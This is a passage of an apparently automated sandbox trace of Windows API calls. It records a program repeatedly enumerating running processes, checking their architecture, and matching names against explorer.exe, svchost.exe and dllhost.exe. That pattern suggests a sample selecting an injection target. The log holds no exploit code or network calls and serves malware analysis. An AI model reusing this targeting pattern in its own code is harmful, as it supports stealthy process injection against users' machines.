th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0228.269] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2c8) returned 0xd8 [0228.269] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0228.269] CloseHandle (hObject=0xd8) returned 1 [0228.269] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0228.270] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0xd8 [0228.270] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0228.270] CloseHandle (hObject=0xd8) returned 1 [0228.270] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0228.270] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x314) returned 0xd8 [0228.270] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0228.271] CloseHandle (hObject=0xd8) returned 1 [0228.271] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0228.271] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x320) returned 0xd8 [0228.271] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0228.271] CloseHandle (hObject=0xd8) returned 1 [0228.271] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0228.272] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7a4) returned 0xd8 [0228.272] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0228.272] CloseHandle (hObject=0xd8) returned 1 [0228.272] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0228.272] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x688) returned 0xd8 [0228.272] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0228.272] CloseHandle (hObject=0xd8) returned 1 [0228.272] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0228.273] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7f0) returned 0xd8 [0228.273] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0228.273] CloseHandle (hObject=0xd8) returned 1 [0228.273] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0228.273] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7d4) returned 0xd8 [0228.273] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0228.273] CloseHandle (hObject=0xd8) returned 1 [0228.273] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0228.274] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x58c) returned 0xd8 [0228.274] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0228.274] CloseHandle (hObject=0xd8) returned 1 [0228.274] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0228.275] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x644) returned 0xd8 [0228.275] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0228.275] CloseHandle (hObject=0xd8) returned 1 [0228.275] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0228.275] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7e0) returned 0xd8 [0228.275] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0228.275] CloseHandle (hObject=0xd8) returned 1 [0228.275] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0228.276] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5d8) returned 0xd8 [0228.276] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0228.276] CloseHandle (hObject=0xd8) returned 1 [0228.276] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0228.277] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7d8) returned 0xd8 [0228.277] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0228.277] CloseHandle (hObject=0xd8) returned 1 [0228.277] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0228.277] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2ac) returned 0xd8 [0228.277] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0228.277] CloseHandle (hObject=0xd8) returned 1 [0228.277] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0228.278] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7fc) returned 0xd8 [0228.278] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0228.278] CloseHandle (hObject=0xd8) returned 1 [0228.278] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0228.278] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x53c) returned 0xd8 [0228.278] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0228.278] CloseHandle (hObject=0xd8) returned 1 [0228.279] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0228.279] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6b4) returned 0x0 [0228.279] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0228.279] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x0 [0228.280] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0228.280] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa58) returned 0x0 [0228.280] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0228.280] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa70) returned 0x0 [0228.280] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0228.281] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xb00) returned 0x0 [0228.281] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0228.281] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbdc) returned 0xd8 [0228.281] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0228.282] CloseHandle (hObject=0xd8) returned 1 [0228.282] lstrcmpiA (lpString1="explorer.exe", lpString2="explorer.exe") returned 0 [0228.282] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0228.282] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x790) returned 0xd8 [0228.282] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0228.282] CloseHandle (hObject=0xd8) returned 1 [0228.282] lstrcmpiA (lpString1="taskeng.exe", lpString2="explorer.exe") returned 1 [0228.282] lstrcmpiA (lpString1="taskeng.exe", lpString2="svchost.exe") returned 1 [0228.282] lstrcmpiA (lpString1="taskeng.exe", lpString2="dllhost.exe") returned 1 [0228.282] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0228.283] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6ac) returned 0x0 [0228.283] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0228.294] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x92c) returned 0xd8 [0228.294] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0228.294] CloseHandle (hObject=0xd8) returned 1 [0228.294] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0228.295] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0xd8 [0228.295] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0228.295] CloseHandle (hObject=0xd8) returned 1 [0228.295] lstrcmpiA (lpString1="explorer.exe", lpString2="explorer.exe") returned 0 [0228.295] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0228.295] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x958) returned 0xd8 [0228.295] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0228.295] CloseHandle (hObject=0xd8) returned 1 [0228.295] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0228.296] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x6ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="gtjtdfe")) returned 1 [0228.296] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5b8) returned 0xd8 [0228.296] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0228.296] CloseHandle (hObject=0xd8) returned 1 [0228.296] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x6ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="gtjtdfe")) returned 0 [0228.297] CloseHandle (hObject=0xd4) returned 1 [0228.297] Sleep (dwMilliseconds=0x3e8) [0229.297] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xd4 [0229.299] Process32First (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0229.300] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0229.300] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0229.300] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0229.300] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0229.301] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x104) returned 0x0 [0229.301] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0229.301] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x148) returned 0x0 [0229.301] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0229.302] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x17c) returned 0x0 [0229.302] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0229.302] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x188) returned 0x0 [0229.302] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0229.303] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1b0) returned 0x0 [0229.303] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0229.303] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0 [0229.303] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0229.304] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1d4) returned 0x0 [0229.304] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0229.304] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1dc) returned 0x0 [0229.304] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0229.305] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x254) returned 0x0 [0229.305] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0229.305] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x298) returned 0x0 [0229.305] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0229.306] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0 [0229.306] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0229.306] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x334) returned 0x0 [0229.306] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0229.307] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x36c) returned 0x0 [0229.307] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0229.307] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a8) returned 0x0 [0229.307] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0229.308] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3f8) returned 0x0 [0229.308] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0229.308] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x124) returned 0x0 [0229.308] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0229.309] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x448) returned 0xd8 [0229.309] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0229.309] CloseHandle (hObject=0xd8) returned 1 [0229.309] lstrcmpiA (lpString1="dwm.exe", lpString2="explorer.exe") returned -1 [0229.309] lstrcmpiA (lpString1="dwm.exe", lpString2="svchost.exe") returned -1 [0229.309] lstrcmpiA (lpString1="dwm.exe", lpString2="dllhost.exe") returned 1 [0229.309] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0229.309] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x480) returned 0x0 [0229.309] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0229.310] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4ac) returned 0xd8 [0229.310] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0229.310] CloseHandle (hObject=0xd8) returned 1 [0229.310] lstrcmpiA (lpString1="taskhost.exe", lpString2="explorer.exe") returned 1 [0229.310] lstrcmpiA (lpString1="taskhost.exe", lpString2="svchost.exe") returned 1 [0229.310] lstrcmpiA (lpString1="taskhost.exe", lpString2="dllhost.exe") returned 1 [0229.310] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0229.311] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4d4) returned 0x0 [0229.311] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0229.311] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x0 [0229.311] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, 